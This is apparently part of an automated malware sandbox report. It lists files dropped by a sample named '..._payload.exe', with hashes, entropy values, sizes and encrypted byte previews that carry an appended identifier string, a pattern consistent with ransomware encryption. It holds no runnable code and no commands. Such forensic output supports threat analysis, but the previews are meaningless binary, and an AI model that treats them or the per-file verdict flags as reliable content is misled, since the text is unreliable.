                                                                                                Preview:ZTGJI|9O".X?.2.........,:.;.r.Y.v.z.....3.Y.&b.~&.P..5>t"..VL...m..W*.../.Y.,#..w...M.'......1..h.s_......3.6.."....g.(uG3=L6..._S...%...l0....U.b..K..Bx..X..;#...#..-.......c.y.~....Z7R..q..I'>~Y.7...W..'...:,.F|C.M;.....5..\....fe.$r..5....i.....k..Fk.@..P?'~.M>...D...x!r..D.......@..OK&.1J......l.f.t.........T)R..,.CT........,..W.}j8B....m..c.......e......{..m.....!....x4.{.....H...D].h.......,V.;.....R.~..6...V.V...@}.0J...VD.....S9.F.cv..p......DE...........M)...:i.Z...A%....Uz.....Ej.B..Jg.V'-../.<..e.\{...(..i...~...g...:.....$.T.....#|....b:.....m..~...0..@<7@..j.\..}7f...C....pd.t:...h:QQ.....M..^0.R...{...7M~....w..bs.@~.....Q.LY........|./.t..[....$.D...b....d..C.Bu..$.8.n^\...R.W.zt........w.@.v~...l.a.Y......S)8.n$S......I.%.U..V.4..OIM...H'..d../.*....`.mN.] .w....,.J.._.....x.b...}....f*...W..dR.^.l..r..A...&.3B...B8.........BV................i.r....a.j..p,.9=@?..."..n.7b.!.d..H)....U.<T.E..:...&..P.-........:..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.840730349275569
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8nkfJC6BLqNPVNpfZMW9Ens22e6RO+5lKCrlwz4xmAE/x7uBYsvPc2Rx3bD:0CmNPfEnl2eiO+5vrl043E/x7uBYucCn
                                                                                                MD5:1E8736C8EFE25FE606C0040A914102FF
                                                                                                SHA1:6BB35670E4AE82BFD9C96C5FA72A1FE0F4065FBF
                                                                                                SHA-256:12D76F53AE31F1A56D866688BCBB111E3929E95469799978172342A54A9B237F
                                                                                                SHA-512:AA79874EDE946A5AFDE764A7317AEA160BACD2049E788437DD00A298B2563347B0FB6BDD0A56403DB63CA8C3839ADE875CBC1FB0F751F37D2C4753623707DA74
                                                                                                Malicious:false
                                                                                                Preview:ZTGJI..B..0Y..C..d....C..O%.:.wJ..q.>.20+.r..".q..\....,j3.C.y..3.$b...}GE....*..7FD.s...w.W....%".v.....P..3..%...w%YxH.$.p]T1lh..JH.z...{._Yq......R....v=...x....s...Y*......A...)...2..f..x.+Z.^.....a.E..Y....'...c.O.....6+Q..c..L..B.to...U.....?+..n....D.....5m.......r-...J..VLF...D.Z.......Y.Q....{Y&3=&!B.o.P...F..w..EvQ.S.%.m.V.f.+....aS|h.+D.../...r.$..]..,..).v...4.%r.>..\@.f......K...VL.. ...M.......i5;.....Dw..H..w#=B...._.....U|..S\u...[R..c.I.=..,...WU.#.;,!b..8..p...d.qyQ?4.Jh(......).G..a.d.y.L.#+.......M.....W}..5.h.b..]o...(.<..,M..X..<..Rx.1,A4.....<..c:..............f}.....vX0.#g]...H....E..8I... ...c.7...7..~.]N....?.I..+..V...<.F..JR.(;..Gd.G(...T. m.<r.b...rX..S.U...% %+...e(-.8\......%.[..S..#..g.s.::Xt...r...t.Y-.......U.j~u.ud...y.3.m...pL.;..hA..31.E._.(....N,].......W......f.X.N..xg.{..0......e.. ..1nU.....G..nU.....nW:[&...R.w.$".F%U....... .<.L..m_.J....0*..j.!.|=.w....g.0y....~|."..]......',.k.2..f...UW..+.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.836125778746072
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:85GkVBmCQMkwTC7W8bLGkOcXYkuzyGEiAV+ca+B6MRUZFx3bD:Gx/Owf8JUks8iQp6wsLD
                                                                                                MD5:AEE6D41A4C719C6B6710A0A943E4F0B4
                                                                                                SHA1:DEA9C146834770D55E40A20CFC929AB399474B3B
                                                                                                SHA-256:6B55E1AB02EAD175DE7D2255F6A7FF1C1C24AF6A59E076ADD09215C397BD67A5
                                                                                                SHA-512:5EA921D6EE5EB51DA9598F2B1D7AED4F0E0B975DF534A75F4BEDA8CE7890A48BA875139960F92D3D487BCB065301C83756A72E138696D6F79064AA4522BEEA3F
                                                                                                Malicious:false
                                                                                                Preview:ZTGJI!.. ..t..>.......i.7J.i....B.0>..+._....w......=R..2.I#..[~..x..IGN...-.i..oe<...Do...~...I....*.....!......m)o.i...Z.......jO4......`J..j.Z%.t.@.O...<....'.f3.G.F....#.(26.......Q..1.v...9.....7.....&.......j...]...obk.Op...&........av.......[...hG..b....t...+t..[7.0E.T..../]..5..(..m..8z.....j..v9..wb..........N.....1...H.9Th.....m..R..........L.M.=B.......T .....B%...........f..<.._}...1X..Z.z.u...P~...#q...._.q.gZ..S..^X^T.i..9..J....?1....b..@....F]...~'m.fk.C.0.....u..w1?.......H.../r.7..fVDF86......am._A....b.<..rP...u.?..>Eb{nz..;..6..F-.../...<.@;.e.-3%...g....2...........`(..l....HtY..$w..}.......=-~n...2...-..........L..w..f[.u.e....v.P...........3s}H.I....Rf{.....%...c.*&....1..YI5[.W..W........A-..*.Kp..M-K.B&^..=.P..T...w.....K`..9.<O....5d.B.....l..m.o~H...T:J.]..LmL...3....9lV.H..C......ra...|..'...;...t......L...}C16N ..H.C2.@.-.3..].s..RV=*...3z...q....4....7...J.2.C.'....;DT5..s\...yt.=.<+....iW.].tQ....7.9..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):495
                                                                                                Entropy (8bit):7.472044181183528
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YWlsdp2KyRjTzng0kCjFPeJqo7689hqlcSo+jil1gJc3cii9a:YCg2BlTzn9zoe8P1Tx3bD
                                                                                                MD5:455A246CF8BD36DCBFF07603C5B80831
                                                                                                SHA1:16B7715040446331780609993624F73000BAFF30
                                                                                                SHA-256:EFCAE1D7FCA538E71F57367EF4EAA7A784A22C5745D81BEB9CF3D2231C9647E1
                                                                                                SHA-512:D579BED949D18B459C232583B15207F10503DD6896D25618AE5328EBED92678A780972FE4DE408E335C0E411E5DA4DC3E101D5442A0D73BD4B891789FA587A95
                                                                                                Malicious:false
                                                                                                Preview:{"ses.fQ.#Y8S3..w9.6^.e.)ki.5.+<.jG...n.3.nu....6.UoL.d.....$.A....A.RCw..9...@.V......C...`.8...SZ....X.....l.S.21.Y.$.|Z..t.c)..6......q..e?.o4..`.~...e.h.ima}^..@x...r......C.z/...ndj..9.W...bw&....C.Z....:..p....,>.<.....&..iPw$/..$,..$..a...W.Q..N..W....n;t:...Y.Pg!.."..]..m..%.vQtj../.E...6`..H.\.. c.]"6......f....^..@...E.c...:.$.\c..J...5..v..>.X.t.v;`.V..9..2..=Cu.......J..`D4Q...1.:..Y...../`BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):385
                                                                                                Entropy (8bit):7.318254814952104
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YGD01fAsGqNvz56dfDAbTBuModSgJc3cii9a:Y40yc0f04MASx3bD
                                                                                                MD5:7B6E6790D829E2CC7F6CC42F403BAB1D
                                                                                                SHA1:FF3873859F6652EB81B3F4261FA6CF4942CF0D9F
                                                                                                SHA-256:9DDCD69AFA8C73B8AEDAA0B5564A5CB0E00F688902DA96F019F5F0499BD9CA0E
                                                                                                SHA-512:E5BBA87C170EB72E3017760CAF852F07345B2774BC9A889535A5E58CC41657BFED20155F5397D3535BB329A130AA1DACF75DE832137F370577A09433002CC319
                                                                                                Malicious:false
                                                                                                Preview:{"cli..PKL....W..GY.....'...74..c...?..z...cX.E....jl.(...#....h.%uHk..X$.E..lVa..'..P.f#L...o.H.v.(./.....L.....<.c!q../....^.R....F........~...?U...z..E.^..F0...TOm5.f.....B......m<ug.68..1.;R.kf.....\......[.o.7^.....w...{.m...n.s...|.h.....`.....!...w.O.E..h....Vj...].9.S....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1550
                                                                                                Entropy (8bit):7.857260582084
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uFTz8zV1IIUkJgR7l/DgGC2FVH7NurfZQ7R7Urlp9NeLD:AT4p1nUkJCl/Mh2FVbgrq9789Nm
                                                                                                MD5:0C33E14B30EBD862E3DD1B65B6403B9E
                                                                                                SHA1:E58C69F16A5F76EA87ED652539E2E9C674D28E15
                                                                                                SHA-256:34FE9FD0EB0AB3C011514A82A99722B7C2E61D80F7A3A6C6B97B23445CCAFE6C
                                                                                                SHA-512:532C82D966876136680CF6367C744BB188AF498036609BC77FD31F1A566B290C4374D7D24FC83FF76D8C3763E71DEB1DC93788DE1F64BB95BBE86A4E74FC1388
                                                                                                Malicious:false
                                                                                                Preview:mozLz..Pmn...<..._...6.....b.rL!.MYDJ...n..'>...`H..xU. .\..D.te.3E0.pP./y.B...u[xx.:......$.*.....*..e..oE.a4.?...=.o.g.|0yg.*,..mY......W7..=....H........rKZ.k...9.G...b@.H..<h...,0.T..d.yD_Q./.!...j...s8.'.\..|.v..........>E'N..t.Z'1..? ...e"..{..'hL...(.jT.Rh.r...M.....K......O.S....ayA [....|...7...5'..E.......>8..g..N...F.........gG...-@.......y...n../.L....d.............2.....ue...7....,..un...o".}....x..`/B..(w.X...W.A.F[l..F.{..L.|...>....j.9.J..f..n....b(..k..<.0.Zd....2..A.....j...&...qK..#....m}bd../.TA.r.C.W.<).f8..*...G.T'....9.>.N.~..H....zO.u....H...z...<.f..<..5..Q.L.....7..y.$D..2_O[.i.. ...s.o....[..>:..hD.s..,5......T..S-...9..W.......+L.g.g_.t.....+...r.h.=.?.p.AT..G.......t..........H..j.u.YXc/p.4C*...._/.z....o....2SN<n.MD..n../...> N.Ze4....~".?y1........xEL}-..x...={|g4.5....5.........@.!..6...bB..E{J.|=.[.m....?...g....dr....$.G....3...f5...H@.<\..........?..+........ ....x.X.g.k..z}<..:V.g`}. ..39NC.-[.]...A..6
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4749
                                                                                                Entropy (8bit):7.958291670417619
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:OP31P+49M+fJ1JUDepOgr/2jYahYY0UiyJIQ9SxpaamX:OPFW4q+7JUDeBru0UZ99Sk
                                                                                                MD5:881B2762470F119BB972762243DD3310
                                                                                                SHA1:DD851EC7973A8B5E6357D9A48E7C43ADA9E3E309
                                                                                                SHA-256:B829FE00AE239CE03F8D869ED8C433EF845FE0E7A4B6CEEA15C0BF5F3E5F2000
                                                                                                SHA-512:BDFB78C82C8EC34616A07BC08169577CCC14905EC5F09D2DC496FB59E9CF5DBAED28CC7F0EF7FCCFA6333D0F1ACE7BBA9F66003B3858E32230FBD442CE6E95F4
                                                                                                Malicious:false
                                                                                                Preview:mozLz....c.1A..D..;...+)L_.6....T..:...7.l....^...V...P.e/..Q,.".j....~......l.q...I...[...\h..>..ow*.....}.`.._./R...2>)..SC..p.^..H.m.......oqg....I....>p..*...]..(..n|..9.$..........)).!C.....1..9(..z.N.......o...7...=..?Mz4....._@.#...:.^Z.ql..b.t6B..A-o......@[.Z!.F..E3.W.=....._...>....q|. ..*$..Z.T.j*..Y.).g..:...:...z...".dT...6.N....V.<.&j..0.C).8*.I..1..].n\.]!.X....3q...7L7......v....i...)...K7.ROz.*......-1`,.v.4.TG.c.7b...{R..D'.}6.ZP.CFm.2}.=..<.............y....=...5..Q.3...|..>.q;h+r.?{X.1.....6.}R.]5n.....X.[.....4.....:t..?.Q..xB."^j..!....h>.7~.D.L.RI{.......!.V.h....__^..i..>..r!...S..G{..6bJ.Zz..)A..JX.{.~...r......Tb@ s|...S...7.*2~R.>.D.a...6h?Ok...}>..aU6.l....t0..R.V.T.....B..i.>..I..%..-Yhz.......G!.b)Q.......a.^1lH.F....+."p.<...z....a5.g.......)..U.U.$"...'.k(n.R../...f.T..f.6....Y..k.....(..M...yV*:".a..g..[....v..<...U...V/...TuN..Bt..q.DX.;+...".Ta..#h. ......K......`if..q.!}If...........4.4`..E.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):131406
                                                                                                Entropy (8bit):7.998550469057662
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:DKSNreXQWxPheiMVW2wuybwpkpR8OHW2ycuXsYavUuhCHt:DKzxPhtMyuybweR8O2Jmo
                                                                                                MD5:9FAED61613E26949342E3CA82A048C5E
                                                                                                SHA1:39BF8960F2BC070C6CBB89134FEE8F6882666E63
                                                                                                SHA-256:BC1E50167ACEB386702D6047BF07F869FE93E1D335173F1C3B9CD7EEC4B27822
                                                                                                SHA-512:297696C3C7C9A996A1EC9A1452AF1E1B92C5F15A050C9A4E4A8AD0AFBADA62EBC0BDB33BC949E71D32E9B375791B9E997C859061F5C45C685A119EF93F4FCD73
                                                                                                Malicious:true
                                                                                                Preview:SQLit...>...V.C_...i.uB.U.v.N.".:D.7J`/.....w...[T'...:.......d.<....y3...9.mq...P...........'.J#.og.M....6...<K..e&SM..,>........v.-w...U_.....D+.M.*Qe.#...>/R.vkX..Aw...!o..zE..N.d.x{%.shq..`."..*......7.oW]tQ..O8S.x.?M...r......sp...."."......f..k?...J.*.N.XW!,..Z....K.......t.{....t{..<..[...Y..^B\..S...P%.@.......w....;..Ge.4-;.wx3..F....:A.Z.1$.....X.._..$.W.^l.*.[.=.3..x$H.o..1..r...H.w.fNm.d}..J"......x....m~.|iu..Q....V.5.?.(k...F.........UOW..-)Uw...J)...i-..r..[v..,H.Z0.........&.1>.}w.....5L.>..%..y...T...F........Fa..R.-lHz...J...-.94.Y@....[.i...%...n..}...Xt..:...B.nQ..G..."...kk.{:]S...d..v..$.@D.#u.....\.?t........PFy.W......In..<............c-...)D.k.{}.}{C"~...NVD....@...Ft.n..=....$..,..........Y..M.J..Sy..C5.r.+,..&..T..@V..D.Qb:.N...5.a.T*..]bA.E......C.L.uG...`2.F......,.}AI..w.[D.1....^-w...}.YWY.cOt..R.c.w..jO..Tg'...).I.[./..K.|_y.h.....)..2..5...>...)..i].u&..."2.K..}..(...k.G<.%/R.gN......*0!..D>...l_..a%n.9.;.z.-.S..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):410
                                                                                                Entropy (8bit):7.29199580255626
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DbKJJ0VLbSKF1cXhUuL703tOfx6OYAgJc3cii9a:aJJ0N2nBL7Kex6TAx3bD
                                                                                                MD5:9D0B2989F0C8A711FA08A98C6CE89F55
                                                                                                SHA1:127A0ADE57E56F2F9ED2DAA72F008B4FBEA28105
                                                                                                SHA-256:F4EA7CDC27699AE5D538BAEF6D4EF170605BE31681504A9AEC7C7E077BBDBFF0
                                                                                                SHA-512:63EED4054367D9473104A76033762698DD6F71BEC1B0F0724FB5DF3A5F172B445C828237C251BC64BC471F53E2AD45CDE03C34828CF8C4730ABCE4115D25398B
                                                                                                Malicious:false
                                                                                                Preview:node_.\.1.m1V..d..!Ew!.{2....c..'[..N....t.z..mu.l...0..grd....l....83.@..[......V...f.."..gH{..}hd0G.'....gb.o...l&.....~.~I.c...*....C....T\..}.C....J.Q.*...[..~|.R.P..6...|..'R".Q....+S#W.O..[f.tr.qx...g..hg.Y.........74....K. ]....\..CN..p.#`Nf;.Ru.jt..2OC7.b..9k..=L^R. ..WU.t.<h.d..0.WI..[4J..3..%........~..u...)*BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):370
                                                                                                Entropy (8bit):7.2907749158951045
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:zCzRd1uI5+y9+7BF5idEvZBexBJzt1CSS35T3P8ziYTxzQng2JOWc3cii96Z:zCzxuheaBjiGZBeDQ135T/8mYVQnggJ4
                                                                                                MD5:EE4E6CB03A65CA84AE62170E0036B061
                                                                                                SHA1:1D45F54C17DC28A47A8C9A800A88DF2947B5027B
                                                                                                SHA-256:00D3924488B501566AF754A529A245493D1BE2FF7745C7AF04AC1E09B5B19873
                                                                                                SHA-512:3DF3DB26E60625BE174189227D80A1A5742F922FE8092FD8380F8288A484518CF2AD3AF2D3AD5F90EBC90163A00BB6E1F8A2DAD70805247FC2298BABA174710A
                                                                                                Malicious:false
                                                                                                Preview:%PDFT...Q,..6.B....v......p!Y..0......U..J.f...Q.8...66....:x./.pJe.....V...........S}.....|Sf./......2..._d.'....k*...e;..KZ.-...&.$..f....S./.-..+....}....z..I....n=X........v...~f...Z.{.EUdA...gX..>.g...i.....mF....LL.g..."n.1z....^...l...p.T.;....!.@?..n..B}k...+5...8[......BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):388
                                                                                                Entropy (8bit):7.330662584793466
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:N5DpNvm2Fqwxoy3M6PEjIp0vKIKEhCYHDmIe1pNdEAA2JOWc3cii96Z:NjvFFo+XPEq0nHiBjPGgJc3cii9a
                                                                                                MD5:1D53490445FA4EAE955735323ED206BA
                                                                                                SHA1:7A449882202C822564015DA0A0B3EAEF5A354CAC
                                                                                                SHA-256:33639715F0486304FD168872969399B2D366008DFE0727B8DE39C8F067288F28
                                                                                                SHA-512:E0831620B998BA773EC271F257D8B273C088AD5AEC966AC1076E19FB3BCF622BC4F1038EECCA1C821613CE611DB686392680346C62703003EACB4E37ED334F86
                                                                                                Malicious:false
                                                                                                Preview:%PDFT..>.c.......c.Y.ce@..m!.b.,Z.N...Fev1!aq...g...`+..g.V......!%.M.a.q3....-H0R.M.'..C....F..k........[#&G.j_.^.|../nUS.R....h.DJj...6W..\Y.[.\......k.a.H!......!.pU..3.D.7mo..#x..D..n3.z,..TW}..L...k.. .]....L!...33... ..."=.,....HJ"5ng..(Ep.......I..L...0.E.@}......I.. .r..".Q........X....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):350
                                                                                                Entropy (8bit):7.29034120351369
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:QIlJWXdDIrFq/uDKhtYbWAZlYDr98ciWMd4L7zXu7TwBCrsC8dS2JOWc3cii96Z:QA2dDSrDKhm3TYDKcDMA7zXO8BCrsC8I
                                                                                                MD5:A1DA0020562BF55DA371387F9385D63F
                                                                                                SHA1:2E6873C2D7309D751014730A511972973ADC7113
                                                                                                SHA-256:4854B63FBD56A4A2E79163129878398360F836FE66B5A6169B71758ECFF6F6B6
                                                                                                SHA-512:C71CA981C417923288D6E41AEAE5EF87E06F6880E9D97075A54B4F854771F78CE4D762F99C4C132759208CFFD011FE31EE0095D36B71167F7E1D3C53C7052986
                                                                                                Malicious:false
                                                                                                Preview:..j.o'...T...~.(..sl.a..Z.....R..U..kO...m..(..?.. .S1.X...#.\<..lAt"..^]6..n?..,!..uh..f........8......%?T+..cB.&I.,.....1.PU<pZ.ZsG...@.p....\%.K...V......5..[8....v.mVW..M.S.7.F..%......M..zM.....=.o*.V....{..^a7....F..R.a..8.I.2.....j.....[,....g.5O.u.?.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1352
                                                                                                Entropy (8bit):7.8499322890951255
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RvqUF4FxPwFNGdB+mycOe3A6R2Av92QhxE77I/omDWYlEx3bD:RvAxPgGdB+SPvcsXhxE3Yoi8LD
                                                                                                MD5:7669AAF59291633B441BF82EEA3EF311
                                                                                                SHA1:3291BDF3BD5671295DEC54223ACE9AF253766CF0
                                                                                                SHA-256:3BBB574B7CB1DE120F7D8A2F8A1FBC664A7F01FC3348BEC2ACB17439225D7108
                                                                                                SHA-512:2708DC58C5010AEAB9E120C7790FE4D859C1AF315618FDCFB5AD2B8295DEB50255E7257FBB4138A7ECC5FAD374FDD93B32B713783607F42759A43EE645C9D3B3
                                                                                                Malicious:false
                                                                                                Preview:<?xml..E.<.+..^Yv..F...../+..9;.XE.......p:...N8...MY.....`.D..B.....1......bI+$.b_).f|2Z..#....)..9.. ........h.2`.D....._2.t".lk.....d.J.'"...BL.K.U2.`nP...JJ..b....v.uF..c.9......r..K?..#........:.....K.fS..s0KI<n..I...\.Q6......x...?.E..8......k.t&.[K../=)*.Hs...#......&.R.....l....&Fm./..D..?.p.M.oP...%..}$.\.#.+i.Q..9U....[.iU.....7^.....l.....*.........&O.J....[-...-..e&.W...........}.....\.8KC..0P..p.d....s....O...e.....d...L.c.......=..pP.".P...m.wi...x.pc .......U<...r.....|I...Bzc(..g..n..V...&\....'1T.8...(M.X...)5....\.8=..N...r,..9.L....*...7..]\`...`.......'6..w{-L-#..L......K?...K....F..8..D....9.F..].).,..eZ.fI.6.a.........>...s....$.&..j..|.1.V(.(d"vWz...].>....,.S...]1..rv...Y.MOub........).6...|......O;>.n....<.B....z`.....m....E...1....V....@.}..h?.h....(.vL...l..3..../{..p......O.t....%.ft..N..eTl...q.f..7.....4...=I.y.yc.......SZ.."X.....4j^b.o.#..e.Rx.q.. b.7..r./I._..[.e>Jo..??....6...\PV^....z.i0...x.z...~S+
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2424
                                                                                                Entropy (8bit):7.918489327356293
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:3102Cp0g/P07EsPAJIvSduQgh/rO7cWhIOPZpUL8MX1FDym87EOLD:lr69kEsoJIvScO8qvULlX1sm87x
                                                                                                MD5:6FE73D1488F5AAABF52A813746DB58A4
                                                                                                SHA1:0D462AC4B9E8702EFEE443BBFE669DF6627E6A90
                                                                                                SHA-256:6E18F13E1C3F30C488333AD06FA0A19F9BF11AC4F6604B02E16D308B55AC959D
                                                                                                SHA-512:ECD51EFA82206EC89E7856A24A3178CBA85ECA5ADF8E4760E99E80DA197872B523524169575BAE795356844410455127188AD94A614B2B90BD9FC3366C015117
                                                                                                Malicious:false
                                                                                                Preview:<?xml J........a-9.-p3._..r......(.O{I.n......5...u....!..W..QE[g..m..8c..Q~KH..c..}P..../.T.?..8....+1...,.X..M.a.4.!..P.J..,...d....n:B...v.~..e'...y.."V1V.<.QJ.,.......i....o1....X>....Ten...~U.....(..=N.]!..h#.......r..U.QQ.....R.......p.V=.....k;.xq.f.D..A-,..K..Y.....Q...j...F;,...".M.A%`,..|.....a.....*f\...j.J.LeN.".>...%j@.I7.x2.R.g>.T.^../......s ...6.N.$@.:/m{.....hy;./..h.\X...Vgz=..g..&.sm.SLo.yr7x.&.L.....e....@J...k..{ .a.'.k.....,.7..bx..ZiA|.q...<....R.....are...3.(B.S.M.FQ....&..X.*.M5&.~y6E.........*..e2.a......6.."..n...T.a.....C..Ty(...%..f?.....e.pjQ..{P.v....rO.RC.]a....[...Z.Ku.V..M[k5kc...3....^.....E.f7..j..5c....U./..n.....3..}.\4.(...l~.1t. ....,...P....S..Z...F..$..b.#.....J`\..lJk..*.f ..zA......s../.@w......Q.:)...{..O.Q....^.y..sh:.z..m...f.E.P.....v6...S.E....$...vQ.....Fuj..I.O.U.+.$[i>...X...L...^x..;[Y.Z.......<.L.t.....b.....o...cw..O...C..h...7y#@.86........"6..p|..yw\.MP....5..K...i.Fv.RM....A./..xX
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2381
                                                                                                Entropy (8bit):7.914361507818911
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:P5QNhy/oKLsLxDzUXXyIRJOBuOnr+JMmgcaF9ozpSOWMo6LD:PiNzKoNzAfJOAOnyjY4YOWfa
                                                                                                MD5:21FA443B7D36C251B273EFED98618515
                                                                                                SHA1:591F668871643B7716DE4BB63D89FA76AD67AF04
                                                                                                SHA-256:948C2F272300BB5E33B6FA9F74E6A580FFAD4E27F4B4D027C3C201A22609E5BB
                                                                                                SHA-512:2FCB296EEA18338D848BE5E7089B48A5AB756ED2A1EBC6459D6EE8EB56F377001F76C98F841315BE42B0976139E884E69E239419EC7041A0C955C3EB4B787E88
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....5..K....|{$..3y...%.J0o..2.....E..(e.a..zm.Dfei.......7.$.@IP.)..V.S.......N...`.C..0.O74..Q.;:.....\...#........S..x}...cl.d,...$...)1.J.?;../../H..........b...w..J....a...(Q4G.5..... .I..E...h.L.%...e..-...M.../aM5.$.`i.....Rs.D;.......W...=...H...Q..=....B....|....W...9....%...pO.....A&...R...|..6.....?.v.b.q.j.7 . V...`.!...FW.?.W..s.mV.O ...D....=J;.......c...r..H...w{.UM.f...s.Tr..~..arL.f[..,.0,Y.J....y#c....L.@..@..0./d......;P..U.e........ES$.j.....tH-....]..J.0.{yT.....t...]..r~.>.......j"...E.F.K&...A..N.Q....9I2.Q/.m`..\..>..NW......t..D9...........p(.Y6...a_h9.I.m..I...K.............&.4..._......*..|......h..R.q$f..]...%C.(.6.4..P...`.;A&.*/^.&&L.)./.K.E.J...e^$....G.:.|...Z.R.p.....E{+b^....6...[......XW*@ ......{..224.e.[=..&.....I.JM.Ji.:_-)....7#c.3..FY.Mv....Ba....7.Ei..Y..l............N.6.|.'E...;\....%.k..{.`....WAe.&...X.(.Zo/......N...]5.L_...xZ:.k.3...e.2 /8.%...f..]s=5....o|./...v.I_..W...~...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2398
                                                                                                Entropy (8bit):7.91230206137605
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:4+UTOgHZ5WhfgDbI+J7yOD9tkNkM4E0qDxCFTtZLDhNwEilgLD:lgHGgNJGaM4E06eLdgG
                                                                                                MD5:7AFC62BB1A2CD0D1230044F48BC193B6
                                                                                                SHA1:99415EB03148F6F89D40F15A57783D7BE91A1749
                                                                                                SHA-256:CDE7FE9D554AE5F6BB1AB4031BCBA165EB233F178DDDECE54576025260E7C41E
                                                                                                SHA-512:14CE5788243D5A2C775189D15121129996069215BC006859DF05FBE9175678BC01306688E2E8E64731B66D88FF5DC55DA1790AEB2D37B552D585A9A3B12C90C9
                                                                                                Malicious:false
